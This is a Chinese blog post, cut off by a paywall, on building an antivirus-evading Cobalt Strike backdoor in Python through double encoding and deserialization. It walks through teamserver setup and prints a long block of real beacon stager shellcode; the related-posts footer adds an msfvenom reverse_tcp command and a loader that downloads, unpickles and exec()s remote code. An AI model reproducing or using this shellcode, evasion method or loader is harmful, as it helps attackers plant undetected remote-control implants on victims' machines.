Python反序列化免杀上线CS:两次编码绕过

已于 2022-08-22 23:05:00 修改
阅读量1.9k 收藏 7
点赞数
文章标签: linux 服务器 php
于 2022-08-21 17:20:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Miracle_ze/article/details/126447615
版权

目录

环境

Windows:win10
kali:linux-2022.2

1、整体过程

本次免杀通过cs生成python后门—将payloadbase64加密—放入服务器下【网上方便被人下载】。
为了避免杀死,我们进行了两次编码

编码base64编码 =》aes 加密 =》base64编码 加密1次 解密1次
【解密之前要进行解码】 =》得到base64编码 aes解密【建议使用rc4,因为ase加密有名容易被发现】

2、环境CobaltStrike准备

1、kali安装CobaltStrike

将CobaltStrike包上传至kali,但是要注意kali是默认拒绝了ssh的密码登录。如此就无法上传文件
如果当弹出服务拒绝了就要去/etc/ssh/sshd_config文档修改。
参考的问题解决博客

vim /etc/ssh/sshd_config

在这里插入图片描述

把文档的PermitRootLogin行注释掉,后面添加PermitRootLogin yes

上传包
在这里插入图片描述
并且进入CobaltStrike_4.0目录,为"agscript"、“c2lint”、"peclone"和"teamserver"文件赋予执行权限。

#进入cs目录,这里我改了文件名原资源包不是这个文件名
cd cobaltstrike4.0/
#查看
ls -l
#赋予权限
chmod a+x agscript
chmod a+x c2lint
chmod a+x peclone
chmod a+x teamserver

然后kali连接并且监听。

./teamserver 192.168.171.152 kali

在这里插入图片描述

2、Windows启动cs连接kali

HOST为kali的IP地址
Port:为./teamserver语句输入后给出的端口
user:随便输入
Password:为./teamserver语句输入的密码即我给的kali
在这里插入图片描述

3、使用cs生成payload

使用cs生成payload
在这里插入图片描述
在这里插入图片描述
查看生产的编码
在这里插入图片描述

# length: 894 bytes
buf = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x27\x23\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x70\x51\x56\x46\x00\x12\x50\x39\xd1\xa5\x3f\x0b\xd0\x98\x82\xb0\x08\xa2\xcc\x9b\x2b\xc5\x7a\xc7\xb4\x29\x29\x2d\xc3\xa6\xe6\x81\xd1\xa0\xc8\x9b\x1e\x9d\x00\x03\x02\x8b\x7a\xd1\x09\xe2\x21\xae\xca\xb8\x8d\x2e\x3c\xe0\xaf\xc9\xed\xce\xd9\x83\x7f\x42\xbd\xe8\xbc\x69\x58\x05\x2b\x38\xfe\x8b\x35\x86\x9a\xb8\x63\x55\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x37\x2e\x30\x3b\x20\x72\x76\x3a\x31\x31\x2e\x30\x29\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x0d\x0a\x00\xf0\xd1\x33\xf3\x1f\x4f\x84\xe8\x66\xfb\xb2\x25\xe1\x9b\x97\x95\x00\x81\xd3\xec\x3e\x90\x2c\x3b\x63\x54\xe9\x29\x5f\x92\x32\xc5\x92\x7d\xb7\xb1\x71\xee\x16\x8a\x05\xdf\x30\xf7\x48\x95\x4b\x66\x31\xf4\x30\x39\xe2\xb4\xe3\xd9\xd9\x15\xe2\x62\xa6\x91\x29\xa6\xbf\x46\xef\x68\x64\xa5\xe9\xe9\x90\x25\x8f\xa2\x10\xb4\x85\x37\xa2\x6f\x7d\x1f\x76\xde\x42\x4f\xb5\x48\xc5\xf8\xd6\xc9\x55\x81\xe6\x6d\x6c\x77\xab\x6b\x8a\xa2\xd4\x86\x18\x79\xba\x1c\x6a\x30\x8a\x73\x40\xc9\xac\xf9\xfe\xe2\xcc\x83\xd8\x91\xb3\x6c\x11\x68\x84\x1a\x59\x54\xb6\xdd\x42\x72\xdf\x82\x51\x56\x71\xad\xc8\x05\xde\xbb\x74\x5e\xe9\x9a\x4c\x9c\x95\xd2\xe2\xdf\x52\xd8\x50\xe7\xc9\xde\x03\x88\x1c\x59\x9c\xb0\x1f\xac\x01\x8a\x33\x3f\x07\xf5\x32\x93\x8e\x38\x4e\xc9\xdf\xf8\xa8\xe3\x1d\x9a\x9b\x07\x8f\x92\x07\xf6\xaa\xbf\x17\x0e\xdd\x4e\x86\x3f\xe0\x63\xed\xd7\xe6\xf3\x74\x80\x7b\xd1\x83\xf2\
最低0.47元/天 解锁文章
Miracle_ze
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python类加载器_利用Python反序列化运行加载器实现免杀
weixin_36266554的博客
02-04 533
前言前几天在看Python的shellcode加载器,在网上找了一个,结果加载器自身就过不了火绒,测试发现是火绒对关键语句进行了识别。 所以我们要想办法去掉加载器中明显的特征。原理及实现在绕过静态查杀方面,主要就是要隐藏特征,比较常见的就是各种混淆、加密,但加密后的代码到最终还是需要去执行它才行,代码执行这一个操作其实特征也是很明显的,像exec、eval、os.system、subprocess...
Python远程加载分离、反序列化免杀
qq_43606723的博客
08-15 1704
shellcode.py远程加载反序列化免杀手法
Python反序列化免杀上线CS
qq_57686163的博客
08-20 783
简单免杀上线cs
CS木马的几种上线方式总结_cs如何上线
最新发布
2401_84281638的博客
05-16 255
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。,毕竟实战是检验真理的唯一标准嘛~最后就是项目实战,这里带来的是。
利用python免杀cs shellcode
蚁景网安学院
02-13 2134
0x01 前言2019年,告别了coder的世界,告别了从前的生活。我决定暂时抛开金钱至上的价值体系,以一个Fucking loser的身份去寻找人生中的三大哲学问题,我是谁,我在哪儿,...
CS-Loader:CS免杀
03-22
CS-避免杀CS免杀,包括python版和C版本的(经测试Python打包的方式在win10上存在bug,无法运行,Win7测试无异常 V1.0:目前测试可以过Defender /火绒的静杀+动杀,360还没测= =不想装360全家桶了,可以自行测试 下一步开发计划: V1.5:加入C版本CS免杀(已完成) V1.7:加入Powershell的免杀(已完成) V2.0:开发出UI界面 V2.0:开发成在线免杀平台(已完成) PS:在实际使用中发现图形化界面不利于和其他工具结合,引用之下命令行的方式更具有扩展性 关于自己写的在线免杀平台,暂不考虑开源,主要是觉得当前的技术还比较薄弱,如果有师傅想体验可以联系我 V3.0:想办法结合更多免杀技术(想去研究下进程注入/文件捆绑,不知道免杀效果怎样) V3.1增加了go版本(可过火绒/ 360 / defender) 依赖环境 Pyt
python反序列化-分离免杀1
08-03
在本文中,我们将深入探讨如何利用 Python 反序列化进行免杀技术,特别是“分离免杀”策略。 免杀技术的主要目标是让恶意代码避开安全软件的检测,从而在目标系统上成功执行。常见的免杀方法包括修改特征码、使用花...
121-利用加载器以及Python反序列化绕过AV.pdf
09-20
为了绕过杀软的检测,攻击者可以使用加载器将Shellcode加载到内存中,并使用Python反序列化来实现绕过AV的目的。 在这篇文章中,我们将介绍利用加载器以及Python反序列化绕过AV的原理和方法。首先,我们需要了解...
浅析Python 序列化与反序列化
09-16
主要介绍了Python 序列化与反序列化的相关资料,文中讲解非常细致,代码帮助大家更好的理解和学习,感兴趣的朋友可以了解下
Python Json序列化与反序列化的示例
09-20
主要介绍了Python Json序列化与反序列化的示例,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
python3序列化与反序列化用法实例
09-22
主要介绍了python3序列化与反序列化用法,实例分析了Python3使用pickle模块针对字符串进行序列化操作的相关技巧,需要的朋友可以参考下
木马免杀代码之python反序列化分离免杀
04-15 887
Cryptography是python语言中非常著名的加解密库,在算法层面提供了高层次的抽象,使用起来非常简单、直观,同时还保留了各种不同算法的低级别接口,保留灵活性我们知道加密一般分为对称加密(Symmetric Key Encryption)和非对称加密(Asymmetric Key Encryption)。各自对应多种不同的算法,每种算法又有不同的密钥位长要求,另外还涉及到不同的分组加密模式,以及末尾补齐方式。
python开发cs软件_【CSPython网页开发
weixin_39926678的博客
11-25 375
目录Django VS Flask VS TornadoDjangoFlaskTornado1.Django VS Flask VS Tornado对比项目:url配置静态文件+模板的配置报错页面的处理Templates 中模板标签 (插值 /控制语句/Escape/加载静态/自定义模板库)部署运行方式2.Django(1)代码# url配置path('', views.index)path('d...
免杀-绕过内存扫描
weixin_44747030的博客
11-16 1419
免杀-绕过内存扫描
第118天:免杀对抗-二开CS&上线流量特征&Shellcode生成机制&反编译重打包(上)
qq_46081990的博客
07-25 807
魔改(二次开发)CS,目的是修改其特征防溯源,或是替换模板让其生成的payload直接达到免杀效果今天的内容主要涉及以下几个方面:(修改前提是将CS的jar文件反编译,修改完后再打包替换) 1 、表面配置特征消除修改CS端口(没改的是50050端口,可修改成其他的端口)修改CS证书配置修改CS加载文件配置 2 、上线流量特征消除采用默认http(s) 的CS请求url为4位字符串(如aaa9),将这4位字符串作为传入,通过算法checksum8会得到92(93) ,蓝队可以以此判定为CS连接器。
python 生成payload_利用Python进行Payload分离免杀
weixin_29300241的博客
02-09 253
缺点:编译成exe以后体积过大实现:msf生成shellcode代码:msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST=192.168.3.60 LPORT=3333 -f c将payload给copy下来,去除引号。\x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\...
免杀对抗-Python-混淆算法+反序列化-打包生成器-Pyinstall
xiaoheizi的博客
09-13 1107
1.生成或者python2.打开pycharm工具,创建一个py文件,将原生态执行代码复制进去shellcode3.将生成的shellcode放到执行代码中,运行代码,cs成功上线1.执行命令,生成shellcode命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.206.129 lport=4444 -f c2.msf设置监听3.将shellcode放到执行脚本中运行。
浅谈利用cs进行免杀的思路总结
goddemon
05-31 3910
思路① 利用c语言+veil实现免杀 #include "pch.h"//可以删除 #include <windows.h> #include <stdio.h> #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//不显示窗口 unsigned char shellcode[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\......";//即生成
python免杀技术---复现+改进----1
qq_41683305的博客
05-22 1330
0x01 复现 复现文章:https://mp.weixin.qq.com/s?__biz=MzI3MzUwMTQwNg==&mid=2247484733&idx=2&sn=5b8f439c2998ce089eb44541d2da7a15&chksm=eb231%E2%80%A6 首先用cobaltstruke生成一个python的payload脚本 然后复制里面的payload进行Base64编码:加密地址为:http://tool.chinaz.com/tools/ba
Python反序列化免杀执行代码
12-07
为了Python反序列化免杀执行代码,可以使用以下步骤: 1. 生成Python x64 shellcode,并将其放入payload.py文件中。 2. 对shellcode进行base64编码,并将其保存在服务器上的shellcode_bs64.txt文件中。 3. 编写shellcode.py文件,向服务器发送请求以读取payload.txt文件,对其进行序列化并进行base64编码。 4. 编写exp.py文件进行反序列化,加载恶意shellcode。 5. 打包exe文件,以便绕过火绒、360等杀毒软件的检测。 以下是具体操作步骤: 1. 生成Python x64 shellcode,并将其放入payload.py文件中。 2. 对shellcode进行base64编码,并将其保存在服务器上的shellcode_bs64.txt文件中。 3. 编写shellcode.py文件,向服务器发送请求以读取payload.txt文件,对其进行序列化并进行base64编码。 ```python import requests import base64 url = 'http://yourserver.com/shellcode_bs64.txt' response = requests.get(url) shellcode = response.content # 对shellcode进行反序列化并进行base64编码 serialized = base64.b64encode(pickle.dumps(shellcode)).decode('utf-8') ``` 4. 编写exp.py文件进行反序列化,加载恶意shellcode。 ```python import requests import base64 import pickle url = 'http://yourserver.com/shellcode.py' response = requests.get(url) serialized = response.content # 对序列化的数据进行反序列化 data = pickle.loads(base64.b64decode(serialized)) # 加载恶意shellcode exec(data) ``` 5. 打包exe文件,以便绕过火绒、360等杀毒软件的检测。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值